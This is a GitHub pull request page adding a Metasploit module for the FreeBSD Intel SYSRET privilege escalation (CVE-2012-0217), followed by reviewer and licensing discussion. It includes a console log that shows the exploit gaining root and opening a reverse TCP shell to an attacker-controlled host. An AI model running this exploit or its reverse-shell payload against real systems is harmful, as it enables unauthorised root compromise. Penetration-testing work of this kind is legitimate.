Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add FreeBSD 8.3 / 9.0 Intel SYSRET Privilege Escalation module #11092

Merged
merged 5 commits into from
Mar 7, 2019
Merged

Add FreeBSD 8.3 / 9.0 Intel SYSRET Privilege Escalation module #11092

merged 5 commits into from
Mar 7, 2019

Conversation

bcoles
Copy link
Contributor

@bcoles bcoles commented Dec 9, 2018
edited
Loading

Add FreeBSD 9 Intel SYSRET Privilege Escalation module.

Lazy wrapper for CurcolHekerLink's iZsh's exploit. I realize we already have the mmap exploit, which covers FreeBSD 9.0 and 9.1, but it's nice to have options.

The payload isn't strictly required. The exploit upgrades the privileges of the current task, and by the time the payload executes we're already root. Given that there's no Meterpreter for BSD, this should never be a problem.

  msf5 > use exploit/freebsd/local/intel_sysret_priv_esc 
  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set session 1
  session => 1
  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > set lhost 123.123.123.188
  lhost => 123.123.123.188
  msf5 exploit(freebsd/local/intel_sysret_priv_esc) > run
  [!] SESSION may not be compatible with this module.
  [*] Started reverse TCP handler on 123.123.123.188:4444 
  [+] FreeBSD version 9.0-RELEASE appears vulnerable
  [+] System architecture amd64 is supported
  [+] hw.model: Intel(R) Core(TM) i9-1337 CPU @ 9.99GHz is vulnerable
  [*] Writing '/tmp/.mTaR4rAPd.c' (4781 bytes) ...
  [*] Max line length is 131073
  [*] Writing 4781 bytes in 1 chunks of 17475 bytes (octal-encoded), using printf
  [*] Writing '/tmp/.LBGkIVh' (218 bytes) ...
  [*] Max line length is 131073
  [*] Writing 218 bytes in 1 chunks of 614 bytes (octal-encoded), using printf
  [*] Launching exploit...
  [*] CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
  [*] 
  [*] [*] Retrieving host information...
  [*]     [+] CPU: GenuineIntel
  [*]     [+] sysname: FreeBSD
  [*]     [+] release: 9.0-RELEASE
  [*]     [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
  [*]     [+] machine: amd64
  [*] [*] Validating target OS and version...
  [*]     [+] Vulnerable :-)
  [*] [*] Resolving kernel addresses...
  [*]     [+] Resolved Xofl to 0xffffffff80b02e70
  [*]     [+] Resolved Xbnd to 0xffffffff80b02ea0
  [*]     [+] Resolved Xill to 0xffffffff80b02ed0
  [*]     [+] Resolved Xdna to 0xffffffff80b02f00
  [*]     [+] Resolved Xpage to 0xffffffff80b03240
  [*]     [+] Resolved Xfpu to 0xffffffff80b02fc0
  [*]     [+] Resolved Xalign to 0xffffffff80b03080
  [*]     [+] Resolved Xmchk to 0xffffffff80b02f60
  [*]     [+] Resolved Xxmm to 0xffffffff80b02ff0
  [*] [*] Setup...
  [*]     [+] Trigger code...
  [*]     [+] Trampoline code...
  [*] [*] Fire in the hole!
  [*] [*] Got root!
  [+] Success! Executing payload...
  [*] Command shell session 2 opened (123.123.123.188:4444 -> 123.123.123.136:61024) at 2018-12-09 10:40:16 -0500
  [+] Deleted /tmp/.mTaR4rAPd.c
  [+] Deleted /tmp/.mTaR4rAPd
  [+] Deleted /tmp/.LBGkIVh
  id
  uid=0(root) gid=0(wheel) groups=0(wheel)
  uname -a
  FreeBSD freebsd-9-0 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan  3 07:46:30 UTC 2012     root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  amd64

h00die
h00die reviewed Dec 9, 2018
View reviewed changes
data/exploits/cve-2012-0217/sysret.c Outdated Show resolved Hide resolved
data/exploits/cve-2012-0217/sysret.c Outdated Show resolved Hide resolved
data/exploits/cve-2012-0217/sysret.c Outdated Show resolved Hide resolved
@bcoles bcoles added docs and removed needs-docs labels Dec 9, 2018
@jmartin-tech
Copy link
Contributor

@msjenkins-r7 test this please.

@bcoles
Copy link
Contributor Author

bcoles commented Dec 13, 2018
edited
Loading

Closer inspection reveals this exploit was likely stolen from @iZsh from fail0verflow. CurcolHekerLink's exploit was posted to EDB in 2013. iZsh's exploit and accompanying analysis is very similar and predates the exploit by about a year:

The original blog publish date is 2012-07-05. The Web Archive page does not have a backup from this date, but the YouTube video confirms the date, as does the commit date on GitHub.

Unfortunately, the exploit is not licensed, and the copyright infringement punishment is undesirable:

// CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)
// Copyright 2012 all right reserved, not for commercial uses, bitches
// Infringement Punishment: Monkeys coming out of your ass Bruce Almighty style.

I would prefer to use the original work. I've updated the module in my local repo, and asked iZsh for permission to use the original exploit. Adding delayed tag for now.

@bcoles bcoles added the blocked Blocked by one or more additional tasks label Dec 13, 2018
@bcoles bcoles added attic Older submissions that we still want to work on again and removed blocked Blocked by one or more additional tasks labels Dec 21, 2018
@bcoles
Copy link
Contributor Author

bcoles commented Dec 21, 2018

Adding attic tag pending approval from @iZsh.

@bcoles bcoles closed this Dec 21, 2018
@iZsh
Copy link

iZsh commented Jan 11, 2019

Sorry, i hadn't noticed your email. Your fear of my license punishment made my day ;-)

You have my approval to use my exploit in metasploit.

@bcoles bcoles reopened this Jan 11, 2019
@bcoles bcoles removed the attic Older submissions that we still want to work on again label Jan 11, 2019
@bcoles bcoles changed the title Add FreeBSD 9 Intel SYSRET Privilege Escalation module Add FreeBSD 8.3 / 9.0 Intel SYSRET Privilege Escalation module Jan 11, 2019
@busterb
Copy link
Member

busterb commented Jan 11, 2019

This is the best!

@busterb busterb self-assigned this Mar 7, 2019
@busterb
Copy link
Member

busterb commented Mar 7, 2019

Darn it, I started checking this earlier, verified it works, but got distracted before landing. Moving forward with that now. Thanks @bcoles

@busterb busterb merged commit 983b39a into rapid7:master Mar 7, 2019
busterb added a commit that referenced this pull request Mar 7, 2019
@busterb
Land #11092, Add FreeBSD 8.3 / 9.0 Intel SYSRET Privilege Escalation …
468679f 
…module
msjenkins-r7 pushed a commit that referenced this pull request Mar 7, 2019
@busterb @msjenkins-r7
Land #11092, Add FreeBSD 8.3 / 9.0 Intel SYSRET Privilege Escalation …
e669dc6 
…module
@busterb
Copy link
Member

busterb commented Mar 7, 2019
edited by gdavidson-r7
Loading

Release Notes

The freebsd/local/intel_sysret_priv_esc exploit module has been added to the framework. This local privilege escalation exploit module targets a vulnerability in the FreeBSD kernel when running on 64-bit Intel processors, leveraging a mishandled edge cases with the SYSRET instruction.

@bcoles bcoles deleted the intel_sysret_priv_esc branch March 7, 2019 02:17
@busterb
Copy link
Member

busterb commented Mar 12, 2019

And just as a verification that this does indeed upgrade the privileges of the current task, here's before and after running bsd/x64/shell_reverse_tcp

%whoami
vagrant
%/tmp/test.elf 
^C
%whoami
root
%

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@h00die h00die h00die left review comments

@wvu wvu wvu left review comments

Assignees

@busterb busterb

Labels
docs module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
7 participants
@bcoles @jmartin-tech @iZsh @busterb @h00die @wvu @gdavidson-r7